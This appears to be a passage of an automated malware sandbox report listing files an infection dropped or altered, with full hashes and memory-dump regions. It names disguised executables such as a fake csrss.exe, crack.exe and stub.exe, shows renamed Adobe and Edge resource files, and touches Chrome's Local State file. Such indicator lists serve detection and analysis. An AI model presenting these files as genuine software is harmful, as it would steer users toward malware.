C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 8e0afaae6903403a76bd1428fe2760a6
SHA1 eddb1b03c4d8d2ed384dd16d5978c761c77d4d80
SHA256 52362b8b4cf693fde715ba516e88e3f244bdb6674c68b66b849badcec8d36e9b
SHA512 8bc29054d1288c57b445bc7887710d6a2e9cbaa4259671ce41531bfe17b656597954621029c3b15bf560ac9aa9e60a613db33ac82ce820656dbd795b5b7a510f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 8398d0aae437f798df3b600fdd0c54a5
SHA1 39691f0d003dd32d974cfb5c3389e43a4902afa1
SHA256 b6922e88babff4df00878baacddc130812c80dc337311ea59279f48222928591
SHA512 8ef138d588ce91ad0f83391d3c44778469a911d0dc5e51b03b8d3cb4d9235d3a1b6af020728fa5b559fa307e523255b6548fd655bb7208022e65c63b941ac4c7

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 13971f0757b41b7c5e3400667b6dc746
SHA1 53a8a001d6e8dd1214cc54a108ffbaf5fe1314b5
SHA256 bfdb791a957e23ca57cb50248c832aa29ccd0b23cac61c933aa39357fe9149da
SHA512 97e7fc045015e9bf6a051c41058f759717e5fa579f5aaecaf3c9fce9d299ab121914f8f9b3e1bb0025cf43d4faf303249f453be7c9699b934d2c666b64c0aa0e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 e17d1f02c00a6b95e7e15303467efe86
SHA1 50b662b5b237b1ffabff37f21a08dc43a51f7977
SHA256 67d47eb225c8caa6a478c7e19af091eff3ed28dd4d0f243d577b6c9b22e07db8
SHA512 4726d45df233ba20e3922980c9ddb53d95f3317d653cabf20733a2ad72fd90cb103b3b7e25d03ef7cf6ac030565f438a90a865c2a794394c84ff93834994fb5d

C:\Windows\SysWOW64\Files\testingfile.exe

MD5 4489c3282400ad9e96ea5ca7c28e6369
SHA1 91a2016778cce0e880636d236efca38cf0a7713d
SHA256 cc68b1903e22d22e6f0a29bcdf46825d5c57747d8eb3a75672a4d6930f60fe77
SHA512 adaeab8aa666057ff008e86f96ae6b9a36ff2f276fdd49f6663c300357f3dc10f59fac7700bb385aa35887918a830e18bddaa41b3305d913566f58aa428a72b0

memory/7812-5034-0x0000000000400000-0x0000000000724000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\main.exe

MD5 9b3fafa68ef718b5b7bf3f1f46c698df
SHA1 cd2de4a0a94d42c278bab73d29d716369ec644f4
SHA256 2443d1fe25f8afbd5b9cd95fdb45e7c6c5b688e815f44f93158e534308d9f9fb
SHA512 a8f180bdf01a59a36e69708420774c2a8607869f8c34ae1e0d40b8298db3b9d88efd0251aa3444b9cdbadad1bf6d8b9d61fb270a41be18f81b10a0505b1b1f28

C:\Users\Admin\AppData\Local\Temp\Files\SQL.exe

MD5 ef0e5882c8bcad3643d51d16c2f5500c
SHA1 6ec8e8996bb693056d2ebcfc18f517d3ec4ca82d
SHA256 b869941a9c476585bbb8f48f7003d158c71e44038ceb2628cedb231493847775
SHA512 e63c5004c7a786ad0c562268817a0f1ed9494cf825ba3e4545e1649c7d3c60fc26ba8aa18bd88fcf44ddadccecbe45890a5e3daead4b16ab3899fdca6de234f1

C:\Users\Admin\AppData\Local\Temp\Files\splwow64_1.exe

MD5 2b01c9b0c69f13da5ee7889a4b17c45e
SHA1 27f0c1ae0ddeddc9efac38bc473476b103fef043
SHA256 d5526528363ceeb718d30bc669038759c4cd80a1d3e9c8c661b12b261dcc9e29
SHA512 23d4a0fc82b70cd2454a1be3d9b84b8ce7dd00ad7c3e8ad2b771b1b7cbca752c53feec5a3ac5a81d8384a9fc6583f63cc39f1ebe7de04d3d9b08be53641ec455

C:\Windows\SysWOW64\Files\JJSPLOIT.V2.exe

MD5 d4a776ea55e24d3124a6e0759fb0ac44
SHA1 f5932d234baccc992ca910ff12044e8965229852
SHA256 7ef4d0236c81894178a6cfc6c27920217bea42a3602ad7a6002834718ba7b93c
SHA512 ba9127f7f84e55a37e4eb1dc1a50d10ef044f0b24a23d451187c8d1dedec26d3a37cf78e8763b351ef1e492e26b1ef9b28fc2331591ce1b53c3d76369d100f4b

memory/6356-5172-0x0000000000880000-0x0000000000BA4000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 6335125a38dd71b36edac7f9fb7cfe19
SHA1 692416f632879e1f7eea5d6b1ac7322151b0bca0
SHA256 220e953dc6768281881cc33c7ffb0b64a381931b9eb9ad32cff5e0004783213c
SHA512 55668b7b2ab8e1de59a954c7a15c17db9d9105e7929ac1d0f43d85e90c0b79f72487e5f253d700eff75c8402a8d7a1c098445fe413ee3d761a4c214fe155b25a

C:\Users\Admin\AppData\Local\Temp\Files\Authenticator222.exe

MD5 7682909e9bda1e07a178ee76c114e42c
SHA1 026d1a42f40b04f0e9b0e1c14631dd226aa57371
SHA256 c9c2671d59e747d93585102e1af0215aaa8e9680c5616f17599380e5209a0d0d
SHA512 78910bbb0de70c0c24209cbd87631567a3eeced223c8129011e02879ec440e86c3847799c311fc256025fd89e48070dbadbd01a3d9e470a3ada6f3fbb774fbde

C:\Users\Admin\AppData\Local\Temp\Files\csrss.exe

MD5 67e4a0dc097ec49476cd4e56805e5e56
SHA1 178e30d7bb19ba8a9ea5c82e554756666fa499bc
SHA256 d98ecf3bdfc1d007e6bee663d92396a3601ca42525940eff2112d67bf5eea721
SHA512 20713335adf129165b9837b1849886b141b6c2f6c874ee732cfc56e336441552cfd31a352afdd9ca1993763e440552b4fd78a888270e3b36c9f47388e1ec0575

C:\Users\Admin\AppData\Local\Temp\Files\t.exe

MD5 aad6256db1d77092b8aa4a34d562ed74
SHA1 d38639790659cfe9282a74aaadf0c273fa5bdb2b
SHA256 824fc258693bdd485e611fb4ac804af96c2dab12a025ed0b7ed2daebe2e6e0f9
SHA512 1950e25d089d559790b5b477f4308ec5322e1a3d9fff0a9d691905fb8d76d4ac90cb64e53b4b2c971617dc17f928a9785804c01bc73bfa3dd844c0484b2e609b

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\identity_proxy\win10\identity_helper.Sparse.Internal.msix.DATA.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 29a7e397b4624c7ca723b18697f0c47f
SHA1 4fa6a4416bb7816de763651af3190ba2eaf052a0
SHA256 fe6ef3ae03729d60ea3681aacb7cfb544ff2d34055643bdf55badc91f8e80549
SHA512 7ee96a046c79d018d94d1dc534e724040b23c9c69c551401571c01b6941bc379457fc023da7e933c0a3d9c98c62726953c66bc0dd400ffab2f0b0d0154370042

C:\Users\Admin\AppData\Local\Temp\Files\856.exe

MD5 68edafe0a1705d5c7dd1cb14fa1ca8ce
SHA1 7e9d854c90acd7452645506874c4e6f10bfdda31
SHA256 68f0121f2062aede8ae8bd52bba3c4c6c8aa19bdf32958b4e305cf716a92cc3d
SHA512 89a965f783ea7f54b55a542168ff759e851eae77cdfa9e23ba76145614b798f0815f2feb8670c16f26943e83bba2ade0649d6dc83af8d87c51c42f96d015573d

C:\Users\Admin\AppData\Local\Temp\Files\WinRarInstall.exe

MD5 af91873c641aab500eba3a3ad6f17b74
SHA1 c52992ba04624bcd87696f9c37c9c708b3c15b9c
SHA256 f568d5c96eefd67d284787b804ab17a610a93dcc48d855515fb187f1b6dba249
SHA512 730a9215911d16cd04d578d7c0f660d3d04282183ad7274bdb18d2f542b044bfe75f76e57fc092bfd6ab28b5f780aff4d01446f8868830d931d860a521795ffc

C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe

MD5 d4e3a11d9468375f793c4c5c2504a374
SHA1 6dc95fc874fcadac1fc135fd521eddbdcb63b1c6
SHA256 0dc03de0ec34caca989f22de1ad61e7bd6bc1eabc6f993dbed2983f4cc33923d
SHA512 9d87f182f02daafad9b21f8a0f5a0eeedb277f60aa2d21bb8eb660945c153503db35821562f12b82a4e84cef848f1b1391c116ff30606cb495cf2e8ce4634217

C:\Users\Admin\AppData\Local\Temp\winrar-info.exe

MD5 cd25f972e64954e2a239dc71deba1543
SHA1 06f03a5d643ee843db318014b245742107ff4442
SHA256 99e4d3d9cf4f315eed1833ebd0412ebf165a0840e2a9737272359c2db81772fc
SHA512 31b732cbc637b67ee0aff91140a12d942df574f1cb8aeada5861bc58139904fa9b0b1611a8333b489a61e94f8f14237394f994eb8f22beb01b9fdbdedbdd3b43

C:\Users\Admin\AppData\Local\Temp\Files\crack.exe

MD5 53e21b02d31fa26942aebea39296b492
SHA1 150f2d66d9b196e545ac5695a8a0001dbd2ef154
SHA256 eecdeeffe3f7627f27eb2683d657a63503744e832702890f4bc97724aeaed73d
SHA512 030f9ab458ecc9954089e88075ca5a9e8bf8fe07483b96a563bc77feaf59cdc4916ed2cc139e7192dcb6f9dc388b8beb837754cf8e79c7c2326ebd02ca5821d1

C:\Users\Admin\AppData\Local\Temp\winrar-x64-701ru.exe

MD5 b53fd2f7cd34ae24dd15b23d2eab08bd
SHA1 994ff51c42d8ed9e8a98b66a7adc172c2fa75c95
SHA256 2177fcc6c2105a01472358ad32a5ce467b4943d69f891cb30bbc82ec42003c60
SHA512 763b2f03a8264bab2f64b99b573d1224537bfb345dfd88da48699f7f42d55dd74ac34272e64f49c20c4534b908f1a1d6e6e9674464bc2e0f33f0ac2f56919d60

C:\Users\Admin\AppData\Local\Temp\Files\file.exe

MD5 af2379cc4d607a45ac44d62135fb7015
SHA1 39b6d40906c7f7f080e6befa93324dddadcbd9fa
SHA256 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
SHA512 69899c47d0b15f92980f79517384e83373242e045ca696c6e8f930ff6454219bf609e0d84c2f91d25dfd5ef3c28c9e099c4a3a918206e957be806a1c2e0d3e99

C:\Windows\SysWOW64\Files\shopfree.exe

MD5 a3881dfafe2384ee33c8afb5eeda3321
SHA1 7e212f0a0b97de88ed97976cd57f18e13a3ff8b6
SHA256 d76391b6dca2b5057a0adfb446cf6f80e9be5ec4241cfeddff6e1ca03b331a72
SHA512 4941b98b27b024e94cb83b804ac184bd6c35b1aefab0351dc9f173bc3510910a05b16949e5b9610c72a622740cb5dc46840a2924db7a994046c982430865b037

C:\Users\Admin\AppData\Local\Temp\Files\stub.exe

MD5 ae143811f815882e5ca0b868e84fb9e1
SHA1 f1df23aca2124eb9e218d3219c33eeffb0db9160
SHA256 10c88c29962ac4bd80a62152c72897726f5d193dca1fa932b4339f417c78961d
SHA512 6ea1c925a3bd1f8bf5e7670e5df6c6b837bab5dfe6c53d59c1a6f1634b6eb8d5c41ca32fd147deb93d5f7fae65c77cdbea7590086b010de5bcc5dc2f981bef4c

memory/5548-5693-0x0000000000D40000-0x0000000000DC8000-memory.dmp